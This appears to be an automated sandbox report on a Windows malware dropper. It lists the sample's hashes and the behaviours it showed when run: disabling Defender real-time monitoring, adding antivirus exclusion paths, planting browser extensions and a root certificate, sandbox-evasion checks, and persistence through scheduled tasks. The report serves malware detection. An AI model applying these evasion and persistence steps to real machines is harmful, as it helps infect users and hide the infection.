Analysis
max time kernel: 218s
max time network: 249s
platform: windows7_x64
resource: win7-20231129-en
resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
submitted: 01/07/2024, 05:06
Static task: static1
Behavioral task: behavioral1
Sample: ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe
Resource: win7-20231129-en
General
Target: ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe
Size: 7.3MB
MD5: 2e71f91c22ed33da2d442a0eb12fe951
SHA1: 0c2eec9c3ff33ef905204a8ae205f533571a1cef
SHA256: ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b
SHA512: 8602a9698c944d5962e190feb04b7ebb471a828f828e9b97c4a9352a45224935d2b9860b2d7d75ab03eb881e5eb380a11bb54ca3f2fa61e068d55882c5929269
SSDEEP: 196608:91OFx9BggZVkFSL0ng/0O9pr89EDAtJ1i1Lzv0GB+grfTuD:3ODH30qD07sFzv3B+SC
Malware Config
Signatures
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" | reg.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nIXneLoYhSqxVZkgocR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijGSqddcuZeU2 = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wWtwQxeSPhIsC = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ijGSqddcuZeU2 = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\nIXneLoYhSqxVZkgocR = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TuhNvssQnTUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\rPjTFWmQUriHtIVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZDLVjxnHU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\wWtwQxeSPhIsC = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\rPjTFWmQUriHtIVB = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\TuhNvssQnTUn = "0" | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZDLVjxnHU = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0" | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | reg.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\PfAmACXkWBLbKqPZ = "0" | reg.exe
Blocklisted process makes network request 1 IoCs
flow | pid | Process
34 | 768 | rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid | Process
2308 | powershell.exe
2572 | powershell.exe
2832 | powershell.EXE
1376 | powershell.EXE
1592 | powershell.exe
1500 | powershell.EXE
2624 | powershell.exe
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\International\Geo\Nation | IbhinZm.exe
Executes dropped EXE 4 IoCs
pid | Process
2236 | Install.exe
2744 | Install.exe
2032 | zxpwdlP.exe
1220 | IbhinZm.exe
Loads dropped DLL 23 IoCs
pid | Process
1992 | ac7fada7fccb1d1ad86d46b89060a5c72c6d2aabd1312bfe9fa670d1129e9e9b.exe
2236 | Install.exe
2236 | Install.exe
2236 | Install.exe
2236 | Install.exe
2744 | Install.exe
2744 | Install.exe
2744 | Install.exe
2472 | WerFault.exe
2472 | WerFault.exe
2472 | WerFault.exe
768 | rundll32.exe
768 | rundll32.exe
768 | rundll32.exe
768 | rundll32.exe
1720 | WerFault.exe
1720 | WerFault.exe
1720 | WerFault.exe
1720 | WerFault.exe
1720 | WerFault.exe
2708 | WerFault.exe
2708 | WerFault.exe
2708 | WerFault.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Drops Chrome extension 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json | IbhinZm.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | IbhinZm.exe
Drops file in System32 directory 30 IoCs
description | ioc | Process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_A3D4688236962EEA03574DE4F61B95D9 | IbhinZm.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4A9377E7E528F7E56B69A81C500ABC24 | IbhinZm.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | zxpwdlP.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 | IbhinZm.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4A9377E7E528F7E56B69A81C500ABC24 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_76B4AC942398240FF309817636D6DBC9 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | rundll32.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | zxpwdlP.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.EXE
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_D55A76EA86A3695733B952639E5D4848 | IbhinZm.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | zxpwdlP.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | IbhinZm.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | IbhinZm.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | zxpwdlP.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 | IbhinZm.exe
Drops file in Program Files directory 13 IoCs
description | ioc | Process
File created | C:\Program Files (x86)\ijGSqddcuZeU2\uYUFrpwaZxCQI.dll | IbhinZm.exe
File created | C:\Program Files (x86)\wWtwQxeSPhIsC\BkKLGDC.xml | IbhinZm.exe
File created | C:\Program Files (x86)\ZDLVjxnHU\YFpaxQ.dll | IbhinZm.exe
File created | C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\YtEWRmR.dll | IbhinZm.exe
File created | C:\Program Files (x86)\wWtwQxeSPhIsC\uqugdoI.dll | IbhinZm.exe
File created | C:\Program Files (x86)\TuhNvssQnTUn\VzZdgjl.dll | IbhinZm.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | IbhinZm.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi | IbhinZm.exe
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | IbhinZm.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | IbhinZm.exe
File created | C:\Program Files (x86)\ZDLVjxnHU\friNppl.xml | IbhinZm.exe
File created | C:\Program Files (x86)\ijGSqddcuZeU2\oEsyZtI.xml | IbhinZm.exe
File created | C:\Program Files (x86)\nIXneLoYhSqxVZkgocR\RHpapsr.xml | IbhinZm.exe
Drops file in Windows directory 4 IoCs
description | ioc | Process
File created | C:\Windows\Tasks\brlogsXZdQLKJRjYtj.job | schtasks.exe
File created | C:\Windows\Tasks\bdmBPZkQYKMDiCzlG.job | schtasks.exe
File created | C:\Windows\Tasks\tRbTscEIBTcXFpe.job | schtasks.exe
File created | C:\Windows\Tasks\SQVSLJdEAqcPOSFTe.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 3 IoCs
pid | pid_target | Process | procid_target
2472 | 2032 | WerFault.exe | 41
1720 | 2744 | WerFault.exe | 29
2708 | 1220 | WerFault.exe | 185
Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Modifies data under HKEY_USERS 64 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | rundll32.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionTime = a06426cc74cbda01 | IbhinZm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecision = "0" | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | IbhinZm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | rundll32.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionTime = a06426cc74cbda01 | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\ee-11-a7-3b-9b-9c | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | IbhinZm.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 608781bb74cbda01 | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft | wscript.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | wscript.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\WpadNetworkName = "Network 3" | IbhinZm.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDetectedUrl | rundll32.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000001b6cbb74cbda01 | zxpwdlP.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | IbhinZm.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | rundll32.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | zxpwdlP.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | IbhinZm.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | IbhinZm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c\WpadDecisionReason = "1" | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software | wscript.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | wscript.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{F14E5156-AE80-41FC-99BE-A6E391A9D977}\ee-11-a7-3b-9b-9c | rundll32.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings | wscript.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | IbhinZm.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | IbhinZm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | wscript.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f003e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\ee-11-a7-3b-9b-9c | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | IbhinZm.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | zxpwdlP.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | IbhinZm.exe
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | IbhinZm.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C | IbhinZm.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob omitted) | IbhinZm.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob omitted) | IbhinZm.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = (certificate blob omitted) | IbhinZm.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
2424 | schtasks.exe
2200 | schtasks.exe
2572 | schtasks.exe
1988 | schtasks.exe
1492 | schtasks.exe
1932 | schtasks.exe
1240 | schtasks.exe
1960 | schtasks.exe
2040 | schtasks.exe
2780 | schtasks.exe
2792 | schtasks.exe
2436 | schtasks.exe
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid | Process
2572 | powershell.exe
2832 | powershell.EXE
2832 | powershell.EXE
2832 | powershell.EXE
1376 | powershell.EXE
1376 | powershell.EXE
1376 | powershell.EXE
1592 | powershell.exe
1500 | powershell.EXE
1500 | powershell.EXE
1500 | powershell.EXE
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
1220 | IbhinZm.exe
